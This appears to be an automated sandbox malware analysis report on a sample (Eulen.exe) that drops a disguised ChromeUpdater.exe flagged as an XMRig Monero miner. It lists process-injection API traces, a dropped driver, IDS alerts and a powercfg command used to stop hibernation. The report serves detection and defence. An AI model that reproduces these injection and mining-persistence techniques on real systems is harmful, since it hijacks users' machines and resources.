          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ~1.PDB @7_9)ux source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001F.00000000.1604975318.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2679708774.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 0000001F.00000000.1605013129.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2680360865.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 0000001F.00000000.1605054038.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2681469155.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99175BE3C FindFirstFileExW,19_2_000002E99175BE3C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCEBE3C FindFirstFileExW,22_2_00000213BDCEBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709DBE3C FindFirstFileExW,23_2_00000158709DBE3C
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15CBE3C FindFirstFileExW,24_2_0000026DB15CBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002A3F066BE3C FindFirstFileExW,26_2_000002A3F066BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9AFBBBE3C FindFirstFileExW,27_2_000002C9AFBBBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002C9B029BE3C FindFirstFileExW,27_2_000002C9B029BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000002C06FD4BE3C FindFirstFileExW,28_2_000002C06FD4BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C3BBE3C FindFirstFileExW,29_2_000002917C3BBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002917C97BE3C FindFirstFileExW,29_2_000002917C97BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002238279BE3C FindFirstFileExW,30_2_000002238279BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000028A1B88BE3C FindFirstFileExW,31_2_0000028A1B88BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486AD7BE3C FindFirstFileExW,32_2_000001486AD7BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001486ADDBE3C FindFirstFileExW,32_2_000001486ADDBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3CDBE3C FindFirstFileExW,33_2_0000024BD3CDBE3C
          Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000024BD3D3BE3C FindFirstFileExW,33_2_0000024BD3D3BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 34_2_000001FA73D6BE3C FindFirstFileExW,34_2_000001FA73D6BE3C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E42FBE3C FindFirstFileExW,39_2_00000249E42FBE3C
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeCode function: 39_2_00000249E432BE3C FindFirstFileExW,39_2_00000249E432BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 41_2_000001CD0240BE3C FindFirstFileExW,41_2_000001CD0240BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA66BE3C FindFirstFileExW,42_2_00000269BA66BE3C
          Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000269BA6CBE3C FindFirstFileExW,42_2_00000269BA6CBE3C
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49711
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49708
          Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1542535250.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2697708247.00000213BD471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
          Source: powershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
          Source: powershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
          Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1542535250.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2697708247.00000213BD471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000016.00000000.1538364369.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2691338350.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 00000016.00000000.1538914753.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2696877762.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1541582166.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1542535250.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2694626100.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1544689459.00000213BD5A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2699670593.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2697708247.00000213BD471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2698769504.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 00000016.00000000.1543691064.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: svchost.exe, 00000020.00000002.2696354530.000001486A5B0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          Operating System Destruction

          barindex
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess information set: 01 00 00 00
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeProcess information set: 01 00 00 00

          System Summary

          barindex
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
          Source: Eulen.exeStatic PE information: section name: .@yC
          Source: Eulen.exeStatic PE information: section name: .j]_
          Source: Eulen.exeStatic PE information: section name: .+.:
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .@yC
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .j]_
          Source: ChromeUpdater.exe.0.drStatic PE information: section name: .+.:
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF6473410C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,14_2_00007FF6473410C0
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991752A7C NtEnumerateValueKey,NtEnumerateValueKey,19_2_000002E991752A7C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,22_2_00000213BDCE26F0
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCE21CC NtQuerySystemInformation,StrCmpNIW,22_2_00000213BDCE21CC
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB15C2A7C NtEnumerateValueKey,NtEnumerateValueKey,24_2_0000026DB15C2A7C
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000223827923F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,30_2_00000223827923F0
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000223827921CC NtQuerySystemInformation,StrCmpNIW,30_2_00000223827921CC
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
          Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exeFile deleted: C:\Windows\Temp\auqpbnqlvfdv.tmp
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF6473414E414_2_00007FF6473414E4
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF64734232814_2_00007FF647342328
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF6473426E814_2_00007FF6473426E8
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647341DB414_2_00007FF647341DB4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B0352F115_2_00007FFB4B0352F1
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99172F2F819_2_000002E99172F2F8
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99172B23C19_2_000002E99172B23C
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99173165819_2_000002E991731658
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917220DC19_2_000002E9917220DC
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99172B03019_2_000002E99172B030
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99175FEF819_2_000002E99175FEF8
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99175BE3C19_2_000002E99175BE3C
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99176225819_2_000002E991762258
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991752CDC19_2_000002E991752CDC
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99175BC3019_2_000002E99175BC30
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99179165819_2_000002E991791658
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E9917820DC19_2_000002E9917820DC
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99178B03019_2_000002E99178B030
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99178F2F819_2_000002E99178F2F8
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E99178B23C19_2_000002E99178B23C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCB20DC22_2_00000213BDCB20DC
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCBB03022_2_00000213BDCBB030
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCBF2F822_2_00000213BDCBF2F8
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCBB23C22_2_00000213BDCBB23C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCC165822_2_00000213BDCC1658
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCE2CDC22_2_00000213BDCE2CDC
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCEBC3022_2_00000213BDCEBC30
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCEFEF822_2_00000213BDCEFEF8
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCEBE3C22_2_00000213BDCEBE3C
          Source: C:\Windows\System32\lsass.exeCode function: 22_2_00000213BDCF225822_2_00000213BDCF2258
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709AF2F823_2_00000158709AF2F8
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709B165823_2_00000158709B1658
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709AB03023_2_00000158709AB030
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709A20DC23_2_00000158709A20DC
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709AB23C23_2_00000158709AB23C
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709DFEF823_2_00000158709DFEF8
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709E225823_2_00000158709E2258
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709DBC3023_2_00000158709DBC30
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709D2CDC23_2_00000158709D2CDC
          Source: C:\Windows\System32\svchost.exeCode function: 23_2_00000158709DBE3C23_2_00000158709DBE3C
          Source: C:\Windows\System32\dwm.exeCode function: 24_2_0000026DB159B23C24_2_0000026DB159B23C
